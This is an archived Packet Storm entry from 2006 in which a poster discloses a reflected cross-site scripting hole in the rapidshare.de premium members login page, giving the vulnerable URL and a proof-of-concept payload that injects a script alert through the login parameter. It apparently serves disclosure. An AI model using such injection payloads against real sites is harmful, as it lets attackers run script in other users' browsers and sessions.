rapidXSS.txt

2006-01-30T00:00:00
ID PACKETSTORM:43474
Type packetstorm
Reporter MoHaJaLi
Modified 2006-01-30T00:00:00

Description

                                        
                                            `Hello All..  
  
i found an XSS vulnerability in the widely known file hosting company :  
http://rapidshare.de  
  
The Vulnerability is in the premium members area:  
https://ssl.rapidshare.de/cgi-bin/premiumzone.cgi  
  
and it goes like this:  
https://ssl.rapidshare.de/cgi-bin/premiumzone.cgi?login=XSSHERE&password=anything  
  
https://ssl.rapidshare.de/cgi-bin/premiumzone.cgi?login=<script>alert("XSS%20IN%20RAPIDSHARE%20BY%20MOHAJALI");</script>&password=anything  
  
  
  
http://mohajali.lezr.org  
  
Salam  
--  
(r).....Now I Am Become Death....The Destroyer Of Worlds....(c)  
`